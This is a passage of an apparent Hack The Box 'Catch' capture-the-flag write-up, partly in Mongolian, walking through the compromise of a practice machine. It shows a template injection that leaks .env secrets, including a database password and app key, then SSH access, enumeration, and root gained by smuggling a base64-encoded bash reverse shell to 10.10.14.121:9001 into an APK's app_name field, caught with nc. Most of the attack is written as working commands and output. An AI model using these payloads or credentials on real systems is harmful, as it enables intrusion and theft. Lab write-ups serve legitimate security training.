<a href="http://10.129.136.74:8001" style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box; color: #bbbfc3; font-size: 19px; font-weight: bold; text-decoration: none; text-shadow: 0 1px 0 white;">
Catch Global Systems
</a>
</td>
</tr>
<!-- Email Body --><tr>
<td class="body" width="100%" cellpadding="0" cellspacing="0" style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box; background-color: #FFFFFF; border-bottom: 1px solid #EDEFF2; border-top: 1px solid #EDEFF2; margin: 0; padding: 0; width: 100%; -premailer-cellpadding: 0; -premailer-cellspacing: 0; -premailer-width: 100%;">
<table class="inner-body" align="center" width="570" cellpadding="0" cellspacing="0" style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box; background-color: #FFFFFF; margin: 0 auto; padding: 0; width: 570px; -premailer-cellpadding: 0; -premailer-cellspacing: 0; -premailer-width: 570px;">
<!-- Body content --><tr>
<td class="content-cell" style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box; padding: 35px;">
<h1 style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box; color: #2F3133; font-size: 19px; font-weight: bold; margin-top: 0; text-align: left;">🔔</h1>
<p style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box; color: #74787E; font-size: 16px; line-height: 1.5em; margin-top: 0; text-align: left;">This is a test notification from Cachet!</p>
<p style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box; color: #74787E; font-size: 16px; line-height: 1.5em; margin-top: 0; text-align: left;">Regards,<br>Catch Global Systems</p>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box;">
<table class="footer" align="center" width="570" cellpadding="0" cellspacing="0" style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box; margin: 0 auto; padding: 0; text-align: center; width: 570px; -premailer-cellpadding: 0; -premailer-cellspacing: 0; -premailer-width: 570px;"><tr>
<td class="content-cell" align="center" style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box; padding: 35px;">
<p style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box; line-height: 1.5em; margin-top: 0; color: #AEAEAE; font-size: 12px; text-align: center;">© 2022 Catch Global Systems. All rights reserved.</p>
</td>
</tr></table>
</td>
</tr>
</table>
</td>
</tr></table>
</body>
</html>
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable
[Catch Global Systems](http://10.129.136.74:8001)
# 🔔
This is a test notification from Cachet!
Regards,Catch Global Systems
© 2022 Catch Global Systems. All rights reserved.
${}
- mail from server -оронд var бичиж өгнө. Жишээ conf:
https://docs.cachethq.io/docs/installing-cachet
field (mail from server) хэсэг дэх утгад ${DB_USERNAME} гэх мэт бичээд browser -г refresh хийгээд харвал conf доторх утгууд харагдана:
APP_ENV=production
APP_URL=http://localhost
APP_KEY=base64:9mUxJeOqzwJdByidmxhbJaa74xh3ObD79OI6oG1KgyA=
DB_DRIVER=mysql
DB_HOST=localhost
DB_DATABASE=cachet
DB_USERNAME=will
DB_PASSWORD=s2#4Fg0_%3!
will
-> s2#4Fg0_%3!
ssh will@10.10.11.150
user.txt
8470a0******
8. Privilege escalation
uname -a
grep -cw smep /proc/cpuinfo; grep -cw smep /proc/cpuinfo
Linux catch 5.4.0-104-generic #118-Ubuntu SMP Wed Mar 2 19:02:41 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
#2
#2
sudo -l
will@catch:~$ sudo -l
[sudo] password for will:
Sorry, user will may not run sudo on catch.
linpeas
#Local VM
python3 -m http.server
#Machine VM
curl http://10.10.14.71:8000/linpeas.sh -o linpeas.sh
chmod +x linpeas.sh #unter /tmp dir
linpeas олдсон зүйлс:
╔══════════╣ Readable files belonging to root and readable by me but not world readable
-rwxr-x--x+ 1 root root 1894 Mar 3 14:23 /opt/mdm/verify.sh
-rw-r----- 1 root will 33 Mar 27 23:14 /home/will/user.txt
╔══════════╣ Checking if runc is available
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation
runc was found in /usr/sbin/runc, you may be able to escalate privileges with it
╔══════════╣ Analyzing Github Files (limit 70)
drwxr-xr-x 2 www-data www-data 4096 Mar 3 02:28 /var/www/html/Cachet/.github
drwxr-xr-x 2 root root 4096 Jun 8 2019 /var/www/html/Cachet/vendor/doctrine/lexer/.github
drwxr-xr-x 3 root root 4096 Mar 21 2021 /var/www/html/Cachet/vendor/guzzlehttp/psr7/.github
drwxr-xr-x 3 root root 4096 Dec 20 2020 /var/www/html/Cachet/vendor/nikic/php-parser/.github
drwxr-xr-x 2 root root 4096 Dec 6 2019 /var/www/html/Cachet/vendor/psy/psysh/.github
drwxr-xr-x 2 root root 4096 Mar 9 2021 /var/www/html/Cachet/vendor/swiftmailer/swiftmailer/.github
-rw-r--r-- 1 git git 162 Dec 14 08:34 /home/git/.gitconfig
drwxr-xr-x 8 www-data www-data 4096 Mar 3 02:28 /var/www/html/Cachet/.git
verify.sh checking
scp will@10.10.11.150:/opt/mdm/verify.sh .
#!/bin/bash
###################
# Signature Check #
###################
sig_check() {
jarsigner -verify "$1/$2" 2>/dev/null >/dev/null
if [[ $? -eq 0 ]]; then
echo '[+] Signature Check Passed'
else
echo '[!] Signature Check Failed. Invalid Certificate.'
cleanup
exit
fi
}
#######################
# Compatibility Check #
#######################
comp_check() {
apktool d -s "$1/$2" -o $3 2>/dev/null >/dev/null
COMPILE_SDK_VER=$(grep -oPm1 "(?<=compileSdkVersion=\")[^\"]+" "$PROCESS_BIN/AndroidManifest.xml")
if [ -z "$COMPILE_SDK_VER" ]; then
echo '[!] Failed to find target SDK version.'
cleanup
exit
else
if [ $COMPILE_SDK_VER -lt 18 ]; then
echo "[!] APK Doesn't meet the requirements"
cleanup
exit
fi
fi
}
####################
# Basic App Checks #
####################
app_check() {
APP_NAME=$(grep -oPm1 "(?<=<string name=\"app_name\">)[^<]+" "$1/res/values/strings.xml")
echo $APP_NAME
if [[ $APP_NAME == *"Catch"* ]]; then
echo -n $APP_NAME|xargs -I {} sh -c 'mkdir {}'
mv "$3/$APK_NAME" "$2/$APP_NAME/$4"
else
echo "[!] App doesn't belong to Catch Global"
cleanup
exit
fi
}
###########
# Cleanup #
###########
cleanup() {
rm -rf $PROCESS_BIN;rm -rf "$DROPBOX/*" "$IN_FOLDER/*";rm -rf $(ls -A /opt/mdm | grep -v apk_bin | grep -v verify.sh)
}
###################
# MDM CheckerV1.0 #
###################
DROPBOX=/opt/mdm/apk_bin
IN_FOLDER=/root/mdm/apk_bin
OUT_FOLDER=/root/mdm/certified_apps
PROCESS_BIN=/root/mdm/process_bin
for IN_APK_NAME in $DROPBOX/*.apk;do
OUT_APK_NAME="$(echo ${IN_APK_NAME##*/} | cut -d '.' -f1)_verified.apk"
APK_NAME="$(openssl rand -hex 12).apk"
if [[ -L "$IN_APK_NAME" ]]; then
exit
else
mv "$IN_APK_NAME" "$IN_FOLDER/$APK_NAME"
fi
sig_check $IN_FOLDER $APK_NAME
comp_check $IN_FOLDER $APK_NAME $PROCESS_BIN
app_check $PROCESS_BIN $OUT_FOLDER $IN_FOLDER $OUT_APK_NAME
done
cleanup
Тайлбар
2>/dev/null
- filter out the errors so that they will not be output
/dev/null
- it is a special file that discards channel output redirect to it.
0 means stdin
1 means stdout(useful output)
2 means stderr(error message output)
psyp logs
/var/www/html/Cachet/.env
/usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6015 -container-ip 172.17.0.17 -container-port 80
/usr/local/bin/gitea web --config /etc/gitea/app.ini
/var/www/html/Cachet/.env:
DB_DRIVER=mysql
DB_HOST=localhost
DB_UNIX_SOCKET=null
DB_DATABASE=cachet
DB_USERNAME=homestead
DB_PASSWORD=secret
DB_PORT=null
DB_PREFIX=null
app_check()
####################
# Basic App Checks #
####################
app_check() {
APP_NAME=$(grep -oPm1 "(?<=<string name=\"app_name\">)[^<]+" "$1/res/values/strings.xml")
echo $APP_NAME
if [[ $APP_NAME == *"Catch"* ]]; then
echo -n $APP_NAME|xargs -I {} sh -c 'mkdir {}'
mv "$3/$APK_NAME" "$2/$APP_NAME/$4"
else
echo "[!] App doesn't belong to Catch Global"
cleanup
exit
fi
}
/res/values/strings.xml
- апп дотроос app_name
хэсгийг хайж байна.
```bash
/bin/bash -i >& /dev/tcp/10.10.14.121/9001 0>&1
/res/values/strings.xml
дотор өөрчлөлт хийнэ:
......
<string name="app_name">Catch|echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjEyMS85MDAxIDA+JjE= | base64 -d | bash</string>
......
build хийнэ.
apktool b -f -d /home/va4mi/Documents/htb/machine/Catch/apk/catchv1.0 -o /home/va4mi/Documents/htb/machine/Catch/apk/catchv2.apk
I: Using Apktool 2.6.1
I: Smaling smali folder into classes.dex...
I: Building resources...
I: Building apk file...
I: Copying unknown files/dir...
I: Built apk...
sign apk:
keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore catchv2.apk alias_name
jarsigner -verify -verbose -certs catchv2.apk
build & sign хийсэн apk-г /opt/mdm/apk_bin
дотор хуулна:
will@catch:/tmp$ wget http://10.10.11.150:8000/catchv2.apk
--2022-04-09 16:35:33-- http://10.10.11.150:8000/catchv2.apk
Connecting to 10.10.11.150:8000... failed: Connection refused.
will@catch:/tmp$ wget http://10.10.14.121:8000/catchv2.apk
--2022-04-09 16:36:18-- http://10.10.14.121:8000/catchv2.apk
Connecting to 10.10.14.121:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2821187 (2.7M) [application/vnd.android.package-archive]
Saving to: ‘catchv2.apk’
catchv2.apk 100%[=================================================================================>] 2.69M 679KB/s in 4.1s
2022-04-09 16:36:23 (679 KB/s) - ‘catchv2.apk’ saved [2821187/2821187]
will@catch:/tmp$ cp catchv2.apk /opt/mdm/apk_bin
will@catch:/tmp$ ls /opt/mdm/apk_bin
catchv2.apk
root
└╼va4mi$nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.121] from (UNKNOWN) [10.10.11.150] 33190
bash: cannot set terminal process group (807862): Inappropriate ioctl for device
bash: no job control in this shell
root@catch:~# ls
ls
Catch
lets-chat
mdm
reset.sh
root.txt
run.sh
root@catch:~# cat root.txt
cat root.txt
8833e6************